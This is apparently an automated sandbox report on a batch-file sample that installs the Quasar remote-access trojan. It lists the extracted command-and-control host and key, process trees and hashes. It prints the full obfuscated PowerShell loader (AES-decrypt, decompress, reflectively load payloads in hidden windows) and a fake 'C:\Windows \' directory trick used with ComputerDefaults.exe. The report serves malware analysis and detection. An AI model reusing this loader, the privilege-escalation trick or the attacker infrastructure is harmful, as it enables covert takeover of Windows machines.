Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 02:32
Static task
static1
Behavioral task
behavioral1
Sample
67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat
Resource
win7-20241010-en
General
-
Target
67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat
-
Size
535KB
-
MD5
b9e1a4ea5f3b3fd0b0394183365edf8b
-
SHA1
79bec6a406682c1385ba71a62e70b5744de0fb76
-
SHA256
67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86
-
SHA512
132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969
-
SSDEEP
12288:jdnWhmK+sUu8PzDo84iBk1XZq51gzyqS996PxMdGos+Rcxdj:9WhmFsJ848Zk9KyMdGL+Y5
Malware Config
Extracted
quasar
1.4.1
Office04
walkout.ddnsgeek.com:8080
27391f85-a482-471a-b2cd-1f8ab5bde32e
-
encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4652-91-0x00000000073E0000-0x0000000007704000-memory.dmp family_quasar -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 16 2884 powershell.exe 23 4652 powershell.exe 24 3164 powershell.exe 26 4652 powershell.exe 28 4652 powershell.exe 32 2884 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3512 powershell.exe 4652 powershell.exe 2280 powershell.exe 5016 powershell.exe 4712 powershell.exe 3024 powershell.exe 3808 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 1048 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid process 1048 ComputerDefaults.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4712 1048 WerFault.exe ComputerDefaults.exe -
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exeComputerDefaults.exepowershell.exepowershell.execmd.execmd.execmd.execmd.exepowershell.execmd.exepowershell.execmd.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ComputerDefaults.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2884 powershell.exe 2884 powershell.exe 3512 powershell.exe 3512 powershell.exe 4652 powershell.exe 4652 powershell.exe 4652 powershell.exe 3164 powershell.exe 3164 powershell.exe 3164 powershell.exe 2280 powershell.exe 2280 powershell.exe 2280 powershell.exe 5016 powershell.exe 5016 powershell.exe 5016 powershell.exe 4712 powershell.exe 4712 powershell.exe 4712 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 3808 powershell.exe 3808 powershell.exe 3808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2884 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeDebugPrivilege 4652 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 4712 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4652 powershell.exe -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
cmd.exepowershell.execmd.exeComputerDefaults.execmd.execmd.execmd.exepowershell.exepowershell.execmd.exepowershell.exedescription pid process target process PID 4064 wrote to memory of 3636 4064 cmd.exe cmd.exe PID 4064 wrote to memory of 3636 4064 cmd.exe cmd.exe PID 4064 wrote to memory of 2884 4064 cmd.exe powershell.exe PID 4064 wrote to memory of 2884 4064 cmd.exe powershell.exe PID 4064 wrote to memory of 2884 4064 cmd.exe powershell.exe PID 2884 wrote to memory of 3512 2884 powershell.exe powershell.exe PID 2884 wrote to memory of 3512 2884 powershell.exe powershell.exe PID 2884 wrote to memory of 3512 2884 powershell.exe powershell.exe PID 2884 wrote to memory of 3464 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 3464 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 3464 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 4940 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 4940 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 4940 2884 powershell.exe cmd.exe PID 4940 wrote to memory of 1048 4940 cmd.exe ComputerDefaults.exe PID 4940 wrote to memory of 1048 4940 cmd.exe ComputerDefaults.exe PID 4940 wrote to memory of 1048 4940 cmd.exe ComputerDefaults.exe PID 1048 wrote to memory of 632 1048 ComputerDefaults.exe cmd.exe PID 1048 wrote to memory of 632 1048 ComputerDefaults.exe cmd.exe PID 1048 wrote to memory of 632 1048 ComputerDefaults.exe cmd.exe PID 632 wrote to memory of 3616 632 cmd.exe cmd.exe PID 632 wrote to memory of 3616 632 cmd.exe cmd.exe PID 632 wrote to memory of 3616 632 cmd.exe cmd.exe PID 3464 wrote to memory of 3684 3464 cmd.exe cmd.exe PID 3464 wrote to memory of 3684 3464 cmd.exe cmd.exe PID 3464 wrote to memory of 3684 3464 cmd.exe cmd.exe PID 3464 wrote to memory of 4652 3464 cmd.exe powershell.exe PID 3464 wrote to memory of 4652 3464 cmd.exe powershell.exe PID 3464 wrote to memory of 4652 3464 cmd.exe powershell.exe PID 3616 wrote to memory of 4448 3616 cmd.exe cmd.exe PID 3616 wrote to memory of 4448 3616 cmd.exe cmd.exe PID 3616 wrote to memory of 4448 3616 cmd.exe cmd.exe PID 3616 wrote to memory of 3164 3616 cmd.exe powershell.exe PID 3616 wrote to memory of 3164 3616 cmd.exe powershell.exe PID 3616 wrote to memory of 3164 3616 cmd.exe powershell.exe PID 4652 wrote to memory of 2280 4652 powershell.exe powershell.exe PID 4652 wrote to memory of 2280 4652 powershell.exe powershell.exe PID 4652 wrote to memory of 2280 4652 powershell.exe powershell.exe PID 3164 wrote to memory of 5016 3164 powershell.exe powershell.exe PID 3164 wrote to memory of 5016 3164 powershell.exe powershell.exe PID 3164 wrote to memory of 5016 3164 powershell.exe powershell.exe PID 2884 wrote to memory of 4900 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 4900 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 4900 2884 powershell.exe cmd.exe PID 3164 wrote to memory of 3500 3164 powershell.exe cmd.exe PID 3164 wrote to memory of 3500 3164 powershell.exe cmd.exe PID 3164 wrote to memory of 3500 3164 powershell.exe cmd.exe PID 3164 wrote to memory of 4712 3164 powershell.exe powershell.exe PID 3164 wrote to memory of 4712 3164 powershell.exe powershell.exe PID 3164 wrote to memory of 4712 3164 powershell.exe powershell.exe PID 3500 wrote to memory of 3440 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 3440 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 3440 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 3024 3500 cmd.exe powershell.exe PID 3500 wrote to memory of 3024 3500 cmd.exe powershell.exe PID 3500 wrote to memory of 3024 3500 cmd.exe powershell.exe PID 3024 wrote to memory of 3808 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 3808 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 3808 3024 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:3636
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "4⤵
- System Location Discovery: System Language Discovery
PID:3684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "7⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "9⤵
- System Location Discovery: System Language Discovery
PID:3440
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 10685⤵
- Program crash
PID:4712
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q3⤵
- System Location Discovery: System Language Discovery
PID:4900
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1048 -ip 10481⤵PID:4044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5938ffc2cba917b243d86b2cf76dcefb4
SHA1234b53d91d075f16cc63c731eefdae278e2faad3
SHA2565c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
SHA512e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314
-
Filesize
53KB
MD53337d66209faa998d52d781d0ff2d804
SHA16594b85a70f998f79f43cdf1ca56137997534156
SHA2569b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA5128bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f
-
Filesize
19KB
MD59be396418f8f61b53dd025a7cbb90af8
SHA19a9fe3c81cea30d326d517ccb5a184255c4731e7
SHA256d4b1595b904f7036e1319c156ad6fa38210750c4032ba43746976a296af277b8
SHA5128a479c28b30fa64e475cf6cb976ad7909cb999407f318ff75def95d3b6e12c4ff48fcea20ad6772d150015fae1993fc63d23b235ebdce69022b80a31efd2731d
-
Filesize
18KB
MD56d559c8b7e31ad465a918a899cb86ac7
SHA1374c95e38eb412356e6b3ad3002717ea93062d53
SHA25616e9ae96042e69fd2c5dc990b5ea891a248def0783d2b3abc76dfc71296da849
SHA51261ed2b1d806b1b6e3fbb2b7d9a3ea87b66fb54a402f440861941e440b57a2af78addb20c7f1abf13277febbfa6cf47f97fe0296b0e2453d89150de79bc22b6dd
-
Filesize
21KB
MD5f64806504ca1964c1a1070f076540d37
SHA1448e45be9d1adbed680cb075f0c043359894e04a
SHA25686bbd420cb6fd81ed3e2e02c6f88b5ae2ce6943db8b3a4a81500e75efa29a2d7
SHA51203b0368622224df6606036280cb7726701d96b31a520b6ee4024a7560aadcfabbd7f50fdc7d8419926094231d2f6f70a7e8498e0b13f0ef7612774a2c1502ca5
-
Filesize
612B
MD51e33e0ac56fc35a18763abee679e9377
SHA14a84ab19484d9a50c5433d6efa450bfbb1ce4bbc
SHA256c2b21254ad76e6c6059c98ed3a2e7fb3141c284945ac5bdac33d412ac6f67480
SHA512d51dfe80ad8d801ae0828580d9795c80b3610c75dce65448c1865443ea7ce5e45369c9b8048785a6590edc37f278451b30776ead7bde5a8431564a86d5d98639
-
Filesize
19KB
MD5ac2a5f730dceeefb451be5bca3570e5e
SHA10bc0a646168965cc00082b2c66bcf1a55117ca72
SHA25603ee4f1deb5cf4e3d325ad3eb149cec7a0dc1d76bf0dc1222c673cc22bf9de4b
SHA51289eb88496c4d4332689b6f80ad722b5fd36f4235e3696d695e0cc1f9a92292432f84fb3513e84e85f963231f41841163ba37a7bb18353e67bb44bf3298f405ee
-
Filesize
535KB
MD5b9e1a4ea5f3b3fd0b0394183365edf8b
SHA179bec6a406682c1385ba71a62e70b5744de0fb76
SHA25667d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86
SHA512132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
